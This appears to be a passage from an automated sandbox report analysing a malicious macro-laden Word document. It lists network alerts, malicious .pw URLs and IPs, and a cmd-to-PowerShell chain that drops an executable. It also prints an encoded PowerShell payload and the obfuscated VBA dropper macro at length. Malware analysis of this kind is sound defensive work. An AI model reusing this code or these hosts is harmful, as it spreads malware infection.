4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" (Show Process)
Spawned process "195082.exe" (Show Process)
Spawned process "195082.exe" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 8
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET DNS Query to a *.pw domain - Likely Hostile" (SID: 2016778, Rev: 4, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO HTTP Request to a *.pw domain" (SID: 2016777, Rev: 11, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET POLICY HTTP traffic on port 443 (POST)" (SID: 2013926, Rev: 8, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1" (SID: 2018358, Rev: 7, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
5/67 reputation engines marked "http://www.utilitybillingsoftwares.com" as malicious (7% detection rate)
6/67 reputation engines marked "http://amor.official.pw/f3sqvf" as malicious (8% detection rate)
9/67 reputation engines marked "http://amor.official.pw" as malicious (13% detection rate) - source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "h@qfvqe.crig"
Pattern match: "drc@e.lidu"
Pattern match: "ap@plicat.run"
Pattern match: "tz@iuqjit.oscwzoilusjcaa" - source
- File/Memory
- relevance
- 3/10
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1328)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
"195082.exe" is creating a new process (Name: "%PUBLIC%\195082.exe", Handle: 164) - source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "195082.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Creates new processes
-
Network Related
-
Found potential IP address in binary/memory
- details
- "91.217.66.130"
- source
- File/Memory
- relevance
- 3/10
-
Found potential IP address in binary/memory
-
Unusual Characteristics
-
Checks for a resource fork (ADS) file
- details
- "powershell.exe" checked file "C:"
- source
- API Call
- relevance
- 5/10
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "vbHide" which indicates: "May run an executable file or a system command"
Found suspicious keyword "ChrW" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings" - source
- Static Parser
- relevance
- 10/10
-
Checks for a resource fork (ADS) file
-
Informative 22
-
Environment Awareness
-
Tries to sleep for a long time (more than two minutes)
- details
- "powershell.exe" sleeping for "1566804069" milliseconds
- source
- API Call
- relevance
- 10/10
-
Tries to sleep for a long time (more than two minutes)
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET INFO Windows OS Submitting USB Metadata to Microsoft" (SID: 2025275, Rev: 1, Severity: 3) categorized as "Misc activity"
Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity" - source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Contacts domains
- details
-
"www.utilitybillingsoftwares.com"
"amor.official.pw"
"t-p-e.net"
"www.erzotech.eu" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"173.203.172.88:80"
"69.175.93.166:80"
"217.160.0.130:80"
"94.199.180.228:80"
"91.217.66.130:443" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: ""
File "zAnsZRGs.bas" (Streampath: "Macros/VBA/zAnsZRGs") has code: "Sub jHTaHviiMS(hiOQkbpDTl) On Error Resume Next Dim zjKzfNnuqlkRw() ReDim LTCcGFScXZQ(2) WHzcCYqoIjQI(0) = 3177291 qSbqwRPl(1) = 4835403 nbNfZW = Loo - 2292541 isqjwOiMaJWc = 478140 * 8695550End SubFunction dQIcNsh()On Error Resume NextWfHIujbNMNc = "rFqs&&BFTlzTPzGCdQvrwoIHmOPvfYujKqSfVh"qTThwY = AETvjbfwG = jwwht = (2469864 / zECEqqcSd + 4546985 * cntUPn * (7986538 / SqoQu / 8404478 - Tan(oirwjN / CBool(DfXFnK / 2736932 / cDEWUSIPjKrru))))DBwcKhIOsSJ = jKoINjBzb = rwTkNzKzfna = (2628108 / MYXqfPKlpVOU + 4206095 * wadMuBWNZAi * (9038376 / WKMDTVYb / 6982330 - Tan(qVhQvBbEQsON / CBool(BbjMPzwWI / 7063003 / oacRvwzHMlnqMl))))MsJPddN = gjHBjhbyuf(WfHIujbNMNc, 25, 11)MTzFiUnVwSG = "GMwcIQAP% tes&&szqsYwLtUMjsADtaqTch"WblCkU = ziGUBcGbZ = JfrSjBLpp = (4919147 / WrXzpHSqobNBoL + 5452952 * UkXBViclMbP * (7876315 / aCCdranjXLVo / 6982231 - Tan(twdCHEVqESYb / CBool(OllOrdEOZLXz / 7095896 / wwYCNlzjpiYI))))Jrwzw = kQkzjFQlZ = mziKjWUlFFWPZt = (6117551 / KprfwDp + 6668634 * nicbSjzPwKbYC * (1068753 / PDcTmVrqRU / 9037759 - Tan(uuBiHvRsss / CBool(nYXzai / 802985 / IkQPsaWwXvnKG))))nuujzXVPTqz = gjHBjhbyuf(MTzFiUnVwSG, 20, 9)kvtdJGZLj = "sRhnLFlidjrjHts&&wo=%2rav% tes&&pIIKSRfsEjc"DiIPcPAXDl = lKVKRsSZk = jBrnpmBkh = (1409454 / CIPwkK + 8284035 * TOVzhFcwXM * (9560337 / DEQraFEwNbihLn / 6685202 - Tan(GMhha / CBool(RLLEKhMoiYjJD / 9644216 / YXiGsRsknltWa))))dzpLulEEWkV = sLiQWInFf = vWlZzFzCj = (7040986 / ipCaidY + 5212357 * TQKmwStTm * (8988797 / msBjkHr / 9091414 - Tan(qiKmPKVcpo / CBool(PdICfLzdiMd / 3032426 / aXpoTqaldwjk))))dpJGfAk = gjHBjhbyuf(kvtdJGZLj, 11, 19)bbWqbSbJJ = "SmlfzfXlXfqjjv%!!%7zFwAPhlpPdQnizo"fcfkRjSV = lUiFVnzHk = nBcGHQqfCEW = (2821453 / ozkYzhrKizSlrS + 7979845 * pOkJAHV * (9450764 / AjzvuUvXXtHkOA / 5084473 - Tan(WFDKUPzATMqlF / CBool(jcncwztPncWOUZ / 6529694 / bNKQdCRmcl))))MIcYmhHOZ = mwbhiKSZM = zlBczHRbnF = (9029479 / SslcaoUiK + 44729 * NLznF * (9733034 / wuMCdpM / 6499395 - Tan(VkqzWqOd / CBool(wBjdFiUzloR / 368376 / McbJzLPO))))InXrLQbYI = gjHBjhbyuf(bbWqbSbJJ, 16, 6)XPHfTP = "TbaQoYjzwCwWnQaMbHVkUYDziEMIdftD2rav%!=%8rav% teShnd"kWMEMBfq = KTtTqlZdf = SLibrzwvnfaKA = (4540349 / tAYZw + 188333 * ZLYWoQFUX * (743658 / aQNrEf / 6307039 - Tan(MDhZzTWPwkBE / CBool(twmSDULiqTI / 4270148 / aHqBw))))GZpckzMhf = ssLoTrmZD = BIjWzZjU = (5236458 / BKVEWjZDv + 8628333 * YuoILVE * (5605853 / jdRtjhkmWftmPc / 9030368 - Tan(WGSjRidKCcN / CBool(NoDcrjsXscYown / 6390145 / zcJRtZoP))))kJQbk = gjHBjhbyuf(XPHfTP, 5, 16)PTJPLcdqonj = "sKWNnav% tes&&sVElbTcWkQUlqz"smwXnkAVLtk = wkpUizVdQ = GiupV = (6274991 / SwhjvNTXtIIh + 5718016 * sIcvPOofLFl * (7319144 / VKzZKWUpj / 1585147 - Tan(AXVzpoNw / CBool(VOaSuFSwnnbz / 1761303 / zMwjwKJqJAHu))))BJirSRMj = ssqpWspzD = jifEEX = (380887 / jXriYlsFOmciEa + 2070647 * NaFzQiIJlqcREt * (1171902 / oMTkCJUFwQdD / 4366926 - Tan(CJTfriSEj / CBool(PiwiIbBUjrpsHa / 9465104 / GAAzE))))jKofwjNlE = gjHBjhbyuf(PTJPLcdqonj, 7, 17)uiZcrs = "kDkYzNHcdKUiHwpduGjwlD=%TwwKRSfILscWQAimaj"bVtOMZUuzBi = oFzENZwwb = ESZYlDAWaMLu = (755278 / dzlzEPA + 363580 * zQlQzoFDcj * (7106843 / YhUBnSkCm / 999525 - Tan(BlaQowtMnCnZH / CBool(mBhUIiKSmEQQwR / 9434752 / zsuWkfY))))oKwalV = YREiWzWkH = BARDidW = (6756375 / zWzXCcPXDvf + 7210861 * HcIDEAo * (4130745 / TIEvQfM / 3328845 - Tan(YnCfCYt / CBool(GGZTp / 5367587 / ltouiYWuMk))))jwhPS = gjHBjhbyuf(uiZcrs, 6, 16)HNljdjwLo = "wwXFzzcMonZlqwjhYkaR&!%LEAMJ"kwYnIhjTMT = TZfYHbXkv = iTiQPX = (277031 / oHmNdDiZBzpN + 6846449 * niXjawYw * (5945049 / MufPjFzdiTnziG / 9214254 - Tan(qhaZvhVOfz / CBool(iwCMqcoAjXTtv / 102489 / fPdnDRk))))RPFvacwunvi = wIrYECiYR = jMOjjHwWqFM = (776384 / niZjCGksw + 5383574 * zuVSXmWKGjNjmf * (9789458 / jRNLXu / 7200403 - Tan(ufSbS / CBool(rjkQimldwDj / 348169 / naunEDzDbjQaDI))))dnviYZlaFD = gjHBjhbyuf(HNljdjwLo, 6, 3)dDBfWqswBYl = "ii1rav%!=%7ishhNjRRjpE"NIYZQjUXwOE = ahkZSdjGd = laTSQkqH = (4181110 / zzwrj + 1477158 * UZzpcV * (3941222 / zvsQa / 3188417 - Tan(wWbzjN / CBool(qQYZYKaissLU / 2289906 / icIFwOTozru))))JMOtpGcmdNn = msDcQhXvh = iQDwKdPCzFG = (898517 / StTtlwTBS + 6510575 * lSWFcLnZiw * (9182690 / EIolEmw / 7232496 - Tan(iUliznmwOhPj / CBool(KsGJaoSja / 4911110 / iOlwNPPUw))))nnwzJzqUUu = gjHBjhbyuf(dDBfWqswBYl, 12, 9)cPWlw = "Skbrav%!&&jFZOwqCt"BlZcj = EwmYtzPpB = NkJCKrzPwv = (1383316 / tIFRov + 9849910 * MmRbczRwd * (9438091 / VtnlAf / 8466257 - Tan(KMsSzuwDdTc / CBool(UpiRbSi / 5050790 / ZzmBplP))))KrKLnD = GXElwOoKU = ThjvniAm = (7165261 / PVKizRVkMFR + 1583440 * hzGPrO * (1200219 / UwGwB / 8830455 - Tan(mVmPEFz / CBool(MVoisDzPCLYz / 9680852 / PJXfivYDjvX))))wfulZS = gjHBjhbyuf(cPWlw, 9, 7)vkudtYdiC = "pkIkorA% teqcpTiusfSNFJr"vLVzPTF = padwMUFpd = pkCOwLopGFwQL = (116143 / bBVIWh + 9119552 * bRjwjfzjNCN * (7466275 / PVYqTEaPNZOdml / 3641392 - Tan(hHMuEbzMNIK / CBool(YiOzNP / 2244147 / wRCcVQOsVVt))))EIjaGGSHw = tiwjvAsqo = LdLuQriLQ = (2956969 / ZnnPEkZoN + 967760 * rORfcCSzVYXGl * (7641070 / iEYjjEGWTqJQq / 3165700 - Tan(BaTTmwcl / CBool(bsTuwCj / 452673 / NBVPdYnlsz))))qccNtmb = gjHBjhbyuf(vkudtYdiC, 14, 6)ifrzOmVju = "ADDOCnTMGmirEQli=%4rav% tes&jRwlfLiQXTTcSvUCP"nihcEZGwn = sBMEEXUMq = qwIGXhIXHaAd = (5481529 / djHGPV + 7474466 * wMmazYXLfGt * (1178067 / WfiiUrCUui / 2909766 - Tan(FbYPNzUzJ / CBool(wTwjjAvvtjWjGA / 4897538 / vikMDiXBr))))AnhCV = wwwRJZIQX = OmkHCZzofCZ = (4163591 / qqCqNzvRw + 8955316 * nBzdkKOQjRKkK * (4272226 / mEpswSaaGaH / 6637038 - Tan(TbRSrtUAZVEUo / CBool(mGfFrU / 6182245 / rbDvYN))))iRGUUsNY = gjHBjhbyuf(ifrzOmVju, 18, 12)dHMZBuXtBo = "wfiYwQTahjlPnawrbwiwpMRw"TPpHONjtX = MczjLFhTO = NdPYGvKQiWs = (3281685 / jzwRPsiaYSqbv + 2252678 * lqNnRhwCZYDSd * (8270365 / ZWumTjP / 7750012 - Tan(ajJpLZzL / CBool(QfnJEzIjzWs / 2352991 / BjOsTjIsJ))))oIvfDVkz = WCvNhYHqA = sjMLXPSvij = (7332736 / vGAiabSFRCqGJ + 7064362 * qRkcHWR * (3883505 / pXqdBkiJXdHpN / 9923734 - Tan(jXuJpsFCmBbduG / CBool(WdlJsCkpEj / 4641259 / ifdZdSmwjcI))))iwqmwDfj = gjHBjhbyuf(dHMZBuXtBo, 9, 1)saLsWqnASUj = "oUrhqtTcaYMJkHtb% tesnzRFNcYSwMOAwCF"DzzaG = uXwhlPEdM = rKrZjNaljcbj = (1708908 / AmrBvJhFHSB + 4055784 * hdDFZ * (3305449 / ooQhsmrYJdNKO / 3005906 - Tan(zXCiCGmCZXL / CBool(tHfWCSS / 8412153 / VKIJSIw))))izIZGwtSTib = dErGlAijD = OjClrJhZzRiHL = (8405930 / XVdMuZjwqZUjFa + 8714990 * wTLDipadBb * (6776398 / qRWtzKNiA / 3772047 - Tan(RflMLW / CBool(czEpfnAnOi / 9077343 / LSqOHYDbjvMObf))))JDFSWTdkrtS = gjHBjhbyuf(saLsWqnASUj, 16, 11)OYkZjF = "vZMLZLFXOIYpLizLzWHYCRtHvisO !%6rav%!!%5ruPKmCXacGz"JmozzDMiUmb = bfKAJVRAO = YUHcSAvwnunRBA = (6982038 / RBIwwofIbcMWM + 9664292 * BZODNw * (6471768 / dNsUEdKiJ / 3198012 - Tan(EPrSAjpw / CBool(poZkp / 7523057 / rmwXtjjfiETb))))qzhjV = fRwCGutrJ = NTXzjf = (7808570 / IfRsSrMtYUjM + 7002645 * QOTkrlTqvvbkZc * (9856544 / DBqtwnJmwGpMV / 4779011 - Tan(zWSDJf / CBool(oCVSkVQhSjuiRi / 4220567 / zcEjlkwGUWniO))))TiwGaYD = gjHBjhbyuf(OYkZjF, 11, 13)NYiUQCn = "ZGnZiroBtCFswYwIBKIA"iNDRRVPpq = BNMAHoiKa = VuaBSIJUr = (9255595 / ZGDRkLskANEks + 4908066 * ssHIUfOTkVz * (3772008 / MZQjPacHJiX / 5644174 - Tan(ZZJRKicjPQMib / CBool(KmSvkrM / 4600293 / wYURzbjKkf))))coSawZIji = iFpKTKRrw = IDwnLRUqmmldBw = (2519102 / pQiHjGcCzJVcw + 7119527 * AQaRsahF * (6046494 / sXztAD / 8100212 - Tan(aVAMoQCbvpBwss / CBool(SlNah / 3966293 / IKzAnjfJ))))WvCDvIYJ = gjHBjhbyuf(NYiUQCn, 4, 4)GDFwGBnd = "iTHULinJSThUjuKlSCamjzozrYW=%KZVWijjDzCwfTczYQcbhSlZlAc"rwhXqMKs = zLrZUujzC = EvljSvLEiXYzk = (3845516 / uSwwkGfVqLR + 5824253 * uIsckqtZHS * (7968212 / qcAGlAbXr / 5050578 - Tan(lwSjYauVBQ / CBool(JZfvPtaHmzI / 5367256 / iiOFKpGkUfHiR))))kOjPZTWp = HUzNwnFHS = bpliwjnccW = (4820347 / uLoLM + 1994197 * ouXRzlGIYDUWlL * (722004 / PZGJAjCfHsCZ / 7742542 - Tan(lbvKdjEXn / CBool(qbOZHAntqXYlFA / 9327176 / rsKFjj))))jIBTlSFkaIz = gjHBjhbyuf(GDFwGBnd, 18, 19)tVrcq = "cBMds% tes&&!%PphDCJJQNjoRFYWN"IIOkakLYFq = qJjnMDQpr = wzlRBuwYEnrLX = (1464802 / hcfRvTWfFj + 4139947 * JwPmfRmuw * (5751684 / SFcnmt / 6918268 - Tan(mZKfalYvacU / CBool(lfWpcpALtkN / 5736157 / SMLTf))))ZIAovifYTz = klVAjwwRo = HWLSd = (9532477 / mjnLwsYmB + 2341859 * bIYNcvsiKkw * (4629327 / KBzEXYuzFtZcj / 3752042 - Tan(szOhmRpfcuuQ / CBool(vmopLzBvtT / 2908472 / RhVOwkvbEq))))dzlRupHv = gjHBjhbyuf(tVrcq, 17, 11)SmQjAWqZ = "wLcQAYLvTkipjXB%htASriabQBjUJXwpiEqqAtdwqnONPGfCzFoD"EYRwpJhmJTG = iINqwQIkf = jJHzzcJY = (982619 / CXuQOJZtfk + 9688985 * JtpplCptja * (1260443 / uKGkXfHiKOjGOz / 5380679 - Tan(qPEuWEzNKJqH / CBool(LsbRwVECpVA / 5616310 / QuKiboaC))))wTwjzJMTq = CTVLbqKsa = ozzwWHp = (3309859 / XkBtERGnFC + 5343342 * ChjJYFFVftK * (2812625 / LdQRYC / 8658360 - Tan(MCRBaR / CBool(VCFpwfmSSpzBj / 9151418 / iamlsopVhziYpi))))fHkdZ = gjHBjhbyuf(SmQjAWqZ, 24, 14)JDVYs = "rSSjtRqll=%6rabcWl"uUOPzhqw = rjEconQrq = YhiorzRaWacWns = (1231442 / wjKoqaYnBcLifJ + 9819434 * JYDpQFjrTsbH * (1687698 / tMVtokhCG / 9573876 - Tan(rnOlnv / CBool(bpMOoRf / 8666963 / SUzwQijizImUOF))))ZBLBU = HRFjYSUFj = OjTIfXENvmOhIw = (8502481 / GfmiIsM + 6955965 * wjlGa * (5594765 / nzkkLXD / 5315579 - Tan(YZcqa / CBool(GnLLoT / 324244 / VUjDioTHVJBt))))UHHIQHPzS = gjHBjhbyuf(JDVYs, 5, 7)UiztOiYhAj = "rUjARvnBPkdunjnozMKJflXwiPZzZmiCWKco"EiNEwWjEQE = abOGzziYC = oiMFljlnSmbHb = (886906 / UtVwrnLnU + 6298797 * cMRTVZlrcEZVAc * (3899832 / NATSzJhdE / 2366004 - Tan(KEdurZpGZV / CBool(QBWkbUvXVUXOwn / 305113 / vTioPJz))))hiEZir = amzJhwLVv = NjSvP = (6505068 / ijqImpf + 1342277 * KtnuhkHDwzcLO * (5160514 / wcMkEj / 3697252 - Tan(lRFiSpnwUCq / CBool(ShAVdbOzSFCU / 1147064 / JKduCGrMCcb))))UulGq = gjHBjhbyuf(UiztOiYhAj, 24, 11)pvRCJFzZ = "qJPInVmJjhlnss&&re=%3rav% tenMKVkbLLwDC"kICFNCSHqIr = PkJXBHipI = RuDosAOGukB = (9285888 / pWjcutdHBRL + 3716983 * fnvfPqdqjdCU * (3412949 / ncXbi / 3607324 - Tan(TBUik / CBool(ibPdrVGUaKOULS / 8468130 / tiIcrp))))dcNiW = fdpcAjMma = fuwPR = (9983320 / zKhNRJG + 4499484 * JKHqW * (1524420 / pwlnP / 3932694 - Tan(IokOpQTcr / CBool(TJRJcNUjFAaBi / 6886621 / XpJSfMvinY))))ntJcDiWtZXO = gjHBjhbyuf(pvRCJFzZ, 12, 15)TjhXiqD = "YLvhXuaslfHORakdIqETj%!!%8ramEDaBb"jblYmUEE = XnTnTozOR = wXchNhVj = (7608024 / XWZJnsVsrQw + 1944908 * IKLPYrUDbUrEf * (9431952 / alOzZvZ / 196267 - Tan(JAaSGXB / CBool(mdTXBRwrS / 5437557 / ChFHvJSGBBkwiJ))))OjhjCHK = wFYRBwESW = CdoYTSFG = (3726471 / wjEsfJoRAT + 281509 * kODLXaQfrj * (2060885 / FRVtmivdfFKR / 245790 - Tan(lsInSCQXsZV / CBool(ufpnlP / 4138942 / mNnvfRYX))))ddWLaoYwjX = gjHBjhbyuf(TjhXiqD, 7, 7)NaivjKdl = "ZtbDzovqzQYAIzkjpHoUIzNrzav%!!%4rav%!!%3ravfQS"FfWIojB = WFYzGlikT = dRiUthMhaLHnJi = (1380969 / osGStKNu + 1978394 * BYUzOzUtFu * (1345293 / dpzjaBmiwpql / 9554827 - Tan(iBCSEnKPfoNaz / CBool(TPdMNB / 2956814 / UJkLIbhL))))RzGnorP = hiCYTSrnp = dNJJWzEd = (2976514 / MiYwaNjshtf + 6653804 * TGfYYpAYqXu * (4610708 / GLnkH / 5881889 - Tan(AzDJFzF / CBool(wFwnufpDqbfn / 2898454 / VGdYYH))))KJZTfP = gjHBjhbyuf(NaivjKdl, 4, 18)vJXWlj = "ZGFbBwmnrPazbKzMQvcADtCo% tGuEJP"mdizzCjwfn = cwHfvfVDQ = BGOCpb = (9005936 / jmoWi + 6003313 * ojAddpuKSsHSPM * (9155354 / SXpInCGwvNC / 1082855 - Tan(JFUcjGwVZnQ / CBool(wwJiJf / 8276703 / GWzoWImaEiQm))))bdLBdzZqvB = ocImnqjFw = skZArG = (9369224 / miLUanG + 6090565 * bUYQrW * (5778434 / TnXuTzlo / 9349273 - Tan(PPVRfdqwia / CBool(CVfHkEkY / 8768928 / NvhYS))))UZpOKtovWMh = gjHBjhbyuf(vJXWlj, 6, 3)lINwNw = "OifETHFzv% tes&&eh=%5ravzFJWcBTAklYPo"VwFRKWVYcck = zEmjVccGl = WrsKaWw = (5350863 / uEdUnQnjpVQsdk + 462025 * UiqNNUpfOUMZ * (5925559 / qsfGBdVkwT / 6426730 - Tan(mkUUsGqVGrHOk / CBool(PzFTEOEOfX / 2395966 / jZTkfXjUi))))iwjzwhSLZai = FKubFjJVz = RWaNXffPToYF = (9457876 / UXQBVL + 7042156 * QsJnLrwivsf * (7500274 / BILwEAHMfJzNlG / 6508637 - Tan(IznAjFiE / CBool(UoQotfZKNTOF / 933276 / LcVkiJZZ))))uOHTI = gjHBjhbyuf(lINwNw, 14, 16)CtkUlwYfi = "rWBYYoGzijNTnitGSIfOKTYZwSNDAfhtqes&&zuuUYvKqOv"kWwfKMS = HDwPksqrt = TLppdhUkYImdjE = (5706241 / LvCqU + 1396499 * cYTTOiSL * (7316254 / RCkVAQZhszSii / 4366092 - Tan(lhjuoCiMvNQKN / CBool(FFzAkP / 223074 / hLfcJcHwztwad))))aIJoivDpaJz = wlQzqmqpH = GLbmtVduHrs = (64706 / PMsBEwPWN + 7654563 * IUjDtcKDZc * (4767064 / iqOcUzpi / 7144802 - Tan(QBlwkmsrMtXziZ / CBool(aAihoatquKLq / 3867875 / XXFqLEiSvrYLhP))))vqzkvC = gjHBjhbyuf(CtkUlwYfi, 7, 8)uGMLD = "ITMvfUBjui=%1rav% tes&&cotpVIjMMVQn"SuJlN = ZuruQINOd = rfzUfpHCAYBG = (6606282 / PioLZ + 2286012 * TlvsivqJBOLQ * (6038291 / GwDNiWpzSKSL / 7619162 - Tan(mTCoRzXtBbw / CBool(QtwJpqCSIhkwu / 7927697 / TTkZXHKXiLWzjN))))SpqZodGzfm = MucQkGwAI = cIVXFiEtb = (85328 / aRBZm + 1047086 * QwSrWEvnI * (6504095 / iBTLPz / 2806753 - Tan(nSzHdXfKmdar / CBool(AbkJCllQcRaWjs / 9732057 / PBEKzSDRqpTr))))NbiHqL = gjHBjhbyuf(uGMLD, 12, 14)FVlzE = "djbuSEbwaMspaFrh=RjRJFNSnspJKidvfHfViCb"fzfiKzsw = wVbTaNRcl = ibiVJ = (2245912 / mfozAcPL + 1989601 * ZWAzb * (8823753 / MsXjoUiRwzJQ / 683747 - Tan(MHokiwczsMH / CBool(MrFkDHht / 1775285 / okzKGhDd))))mMPkLiSVq = GvGQNOLMw = HOAKcYHrLMwBjK = (5151741 / TEnTsvuPGMJwdr + 4794945 * KlluQdIZCPVrj * (800903 / wpRvHZd / 624150 - Tan(UlDPOLN / CBool(nFrzYffp / 9240501 / RcZCiCA))))TiZukVvz = gjHBjhbyuf(FVlzE, 23, 7)OBGPOmGfQ = "ZGnQizwzoDtOIfIbhAmCGVfzPkMvdD=%bPVGcr"QdcZqz = OjoGNvXqa = mauPUnlQsnzzu = (6763268 / WphNww + 6226747 * vUDNtKJPA * (6267498 / zZVEaXsw / 2780508 - Tan(iPpFzrFpdcsG / CBool(zuRas / 982644 / YzSajjAlHpF))))MDqLVl = CRlMEOHvT = ZXEbt = (4712304 / JIzArfPjz + 2828268 * 